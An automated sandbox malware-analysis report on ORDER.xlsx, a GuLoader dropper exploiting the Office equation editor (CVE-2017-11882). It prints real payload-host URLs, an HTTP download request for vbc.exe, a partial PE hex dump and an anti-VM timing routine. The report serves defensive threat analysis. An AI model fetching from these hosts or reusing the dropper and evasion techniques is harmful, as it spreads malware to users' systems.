Windows Analysis Report ORDER.xlsx

Overview

General Information

Sample Name:	ORDER.xlsx
Analysis ID:	482999
MD5:	c82cca02226f7910cd552124c3cf6e7f
SHA1:	79214e25d81860d25a8e88df99d487394c029da1
SHA256:	5a9f905842cac5fabeb0719527960d0ff67d2c5fc88f163b4f2dcbb366fac62f
Tags:	GuLoaderVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin"}

Multi AV Scanner detection for submitted file

Source: ORDER.xlsx	Virustotal: Detection: 28%			Perma Link
Source: ORDER.xlsx	ReversingLabs: Detection: 25%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 67MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 10:13:58 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 22:47:50 GMTETag: "21000-5cbe84130fcf7"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 95 b4 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 c3 37 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 b9 01 00 28 00 00 00 00 10 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 ae 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /reverse/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ED60BCE4.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED60BCE4.emf

Jump to behavior

Source: global traffic

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003669E3	6_2_003669E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B43F	6_2_0036B43F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363822	6_2_00363822
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B412	6_2_0036B412
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363008	6_2_00363008
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365067	6_2_00365067
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364C64	6_2_00364C64
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364460	6_2_00364460
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036586D	6_2_0036586D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369445	6_2_00369445
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B494	6_2_0036B494
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A092	6_2_0036A092
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363491	6_2_00363491
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364C9F	6_2_00364C9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369C9B	6_2_00369C9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365485	6_2_00365485
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B883	6_2_0036B883
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003654F8	6_2_003654F8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365CE0	6_2_00365CE0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B4D9	6_2_0036B4D9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A538	6_2_0036A538
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B52D	6_2_0036B52D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036391F	6_2_0036391F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036510B	6_2_0036510B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B57C	6_2_0036B57C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369D66	6_2_00369D66
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036595D	6_2_0036595D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003631BF	6_2_003631BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003699AD	6_2_003699AD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369D9B	6_2_00369D9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362D83	6_2_00362D83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003631FB	6_2_003631FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003651ED	6_2_003651ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003699EB	6_2_003699EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003639D3	6_2_003639D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003655D3	6_2_003655D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365DC0	6_2_00365DC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365A3F	6_2_00365A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A603	6_2_0036A603
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362672	6_2_00362672
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364AB7	6_2_00364AB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003656BF	6_2_003656BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003636BB	6_2_003636BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A6A5	6_2_0036A6A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003666AE	6_2_003666AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B6AF	6_2_0036B6AF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036AA94	6_2_0036AA94
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369A84	6_2_00369A84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364AFC	6_2_00364AFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003632EB	6_2_003632EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003652D1	6_2_003652D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363AC5	6_2_00363AC5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369ACD	6_2_00369ACD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364336	6_2_00364336
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A739	6_2_0036A739
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A32B	6_2_0036A32B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363710	6_2_00363710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A710	6_2_0036A710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365B09	6_2_00365B09
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369FBF	6_2_00369FBF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362BBC	6_2_00362BBC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A3BD	6_2_0036A3BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003643BB	6_2_003643BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B7A1	6_2_0036B7A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A7AB	6_2_0036A7AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369B9B	6_2_00369B9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036938A	6_2_0036938A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365789	6_2_00365789
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365BF1	6_2_00365BF1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003623DA	6_2_003623DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003653C3	6_2_003653C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003633CF	6_2_003633CF

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003669E3 NtAllocateVirtualMemory,	6_2_003669E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00366A43 NtAllocateVirtualMemory,	6_2_00366A43
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00366B38 NtAllocateVirtualMemory,	6_2_00366B38

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: ORDER.xlsx	Virustotal: Detection: 28%
Source: ORDER.xlsx	ReversingLabs: Detection: 25%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDE6.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419564 push esi; retn 000Ch	6_2_004196B9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407A1A push edi; ret	6_2_00407BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405CE3 pushad ; ret	6_2_00405CE8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004060E5 push ds; ret	6_2_004060E6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408903 push edi; retf	6_2_00408906
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407B8C push edi; ret	6_2_00407BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036001A pushad ; retf	6_2_0036001C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036007A pushad ; retf	6_2_0036007C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00360E7A push 81D7EEE9h; ret	6_2_00360E80
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362268 push ds; retf	6_2_00362276
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00361B92 push esp; retf	6_2_00361B95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003603FD pushad ; retf	6_2_003603FE

Source: initial sample	Static PE information: section name: .text entropy: 7.10018192133
Source: initial sample	Static PE information: section name: .text entropy: 7.10018192133

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 0000000000369799 second address: 0000000000369799 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 29D86A1Dh 0x00000007 sub eax, 1A2EF41Ch 0x0000000c xor eax, 7F8AA893h 0x00000011 xor eax, 7023DE93h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FF3F0AF7358h 0x0000001e lfence 0x00000021 mov edx, 100ABEA1h 0x00000026 xor edx, 6F0D7B68h 0x0000002c xor edx, 62879C8Ah 0x00000032 xor edx, 627E5957h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007FF3F0AF739Ah 0x0000003f test ax, cx 0x00000042 cmp ecx, edx 0x00000044 test ebx, eax 0x00000046 cmp edx, 8B44DCE9h 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 add edi, edx 0x00000052 dec dword ptr [ebp+000000F8h] 0x00000058 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005f jne 00007FF3F0AF72E8h 0x00000061 jmp 00007FF3F0AF739Eh 0x00000063 test edx, 67D05910h 0x00000069 call 00007FF3F0AF73A3h 0x0000006e call 00007FF3F0AF7379h 0x00000073 lfence 0x00000076 mov edx, 100ABEA1h 0x0000007b xor edx, 6F0D7B68h 0x00000081 xor edx, 62879C8Ah 0x00000087 xor edx, 627E5957h 